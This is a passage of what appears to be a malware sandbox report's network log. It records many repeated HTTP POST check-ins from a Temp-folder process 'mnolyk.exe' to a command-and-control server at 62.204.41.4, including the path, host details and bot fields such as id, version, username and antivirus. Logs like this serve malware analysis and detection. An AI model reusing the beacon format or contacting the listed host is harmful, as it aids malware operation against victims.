                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            155 | 192.168.2.4 | 49850 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:10.307888985 CET | 344 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.372134924 CET | 344 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            156 | 192.168.2.4 | 49851 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:10.567171097 CET | 345 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.634892941 CET | 345 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            157 | 192.168.2.4 | 49852 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:10.929233074 CET | 346 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.994447947 CET | 346 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            158 | 192.168.2.4 | 49853 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:11.209207058 CET | 347 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:11.274975061 CET | 347 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            159 | 192.168.2.4 | 49854 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:11.554320097 CET | 348 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:11.617574930 CET | 348 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            16 | 192.168.2.4 | 49711 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:28.358985901 CET | 205 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.420788050 CET | 205 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            160 | 192.168.2.4 | 49855 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:12.691905022 CET | 349 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:12.758178949 CET | 349 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            161 | 192.168.2.4 | 49856 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:12.965502024 CET | 350 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:13.029299974 CET | 350 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            162 | 192.168.2.4 | 49857 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:13.235521078 CET | 351 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:13.301399946 CET | 351 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            163 | 192.168.2.4 | 49858 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:14.073652029 CET | 352 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:14.140455008 CET | 352 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            164 | 192.168.2.4 | 49859 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:14.384505987 CET | 353 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:14.448601961 CET | 353 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            165 | 192.168.2.4 | 49860 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:15.268342972 CET | 354 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.334136009 CET | 354 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            166 | 192.168.2.4 | 49861 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:15.536359072 CET | 355 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.598979950 CET | 355 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            167 | 192.168.2.4 | 49862 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:15.775839090 CET | 356 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.839797020 CET | 356 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            168 | 192.168.2.4 | 49863 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:16.006052971 CET | 357 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.070940018 CET | 357 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            169 | 192.168.2.4 | 49864 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:16.250245094 CET | 358 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.312988043 CET | 358 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            17 | 192.168.2.4 | 49712 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:28.587243080 CET | 206 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.651802063 CET | 206 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            170 | 192.168.2.4 | 49865 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:16.496279955 CET | 359 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.558892965 CET | 359 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            171 | 192.168.2.4 | 49866 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:16.739355087 CET | 360 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.801388979 CET | 360 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            172 | 192.168.2.4 | 49867 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:16.999762058 CET | 361 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.067038059 CET | 361 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            173 | 192.168.2.4 | 49868 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
